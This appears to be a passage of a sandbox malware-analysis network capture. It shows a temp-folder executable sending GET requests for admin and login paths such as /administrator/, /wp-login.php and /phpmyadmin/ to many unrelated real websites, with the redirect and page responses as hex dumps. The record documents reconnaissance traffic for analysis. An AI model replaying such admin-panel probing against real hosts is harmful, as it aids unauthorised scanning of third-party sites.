                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706722975 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.922951937 CET443INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 77 2e 72 65 64 73 61 2e 6e 65 74 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                235192.168.2.655648138.66.39.20580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.706724882 CET187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.934813023 CET123INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/administrator/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.347153902 CET196OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.575854063 CET132INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                236192.168.2.655635185.51.191.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.707231045 CET183OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011650085 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=23f7eaadf58f82aa563c3935188e436f; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 33 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 334e<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011668921 CET1286INData Raw: 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011703014 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011722088 CET1286INData Raw: 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 77 70 2d 61 64 6d 69 6e 2f 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ttp://innovationdevelopment.eu/pl/wp-admin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/wp-admin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/wp-admin/" /><link h
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011739016 CET1286INData Raw: 74 42 79 49 64 28 27 61 6a 61 78 27 29 2e 73 72 63 3d 27 73 69 74 65 73 2f 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74 6f 27 22 3e 0d 0a 09 09 09 3c 69 6d 67 20 73 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript:void();" role="
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.011754990 CET1286INData Raw: 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 49 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">Contact</a>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.012036085 CET1286INData Raw: 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 26 68 3d 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 41 57 5f 63 6f 6f 6b 69 65 5f 61 6c 65 72 74 22 20 73 74 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetCookie('cookie_allowe
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.012053967 CET1286INData Raw: 6f 6b 69 65 73 29 20 6d 61 79 20 70 6c 61 63 65 20 64 75 72 69 6e 67 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72 20 6f 72 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 2c 20 77
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: okies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Storage in terms of two d
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.012072086 CET1286INData Raw: 20 62 75 74 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 74 68 65 6d 20 62 79 20 74 68 65 20 75 73 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61 62 6c 65 20 74 68 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br> This website uses co
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.012089014 CET1286INData Raw: 6f 74 65 72 5f 74 69 74 6c 65 22 3e 50 61 72 74 6e 65 72 73 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c 69 6d 67 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 2f 63 6b 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oter_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png" style="height:35px
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.036923885 CET810INData Raw: 3a 32 39 70 78 3b 20 77 69 64 74 68 3a 32 39 70 78 22 20 2f 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 47 65 74 20 74 68 65 20 6c 61 74 65 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input type="text" name="em


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                237192.168.2.655742186.113.7.20480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710074902 CET191OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.893454075 CET154INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.394844055 CET200OUTGET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.577948093 CET158INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                238192.168.2.65575118.200.3.22480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.729595900 CET175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hero-wars.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.940295935 CET368INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.hero-wars.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                239192.168.2.65613134.149.46.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.818918943 CET182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.921565056 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                240192.168.2.65607764.190.63.13680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.860414982 CET204OUTGET /administrator/?usid=27&utid=4923801068 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww1.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.070002079 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                241192.168.2.65612487.233.198.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.909919024 CET186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.103935003 CET123INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                242192.168.2.65599154.71.181.16080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.926518917 CET183OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.098505020 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
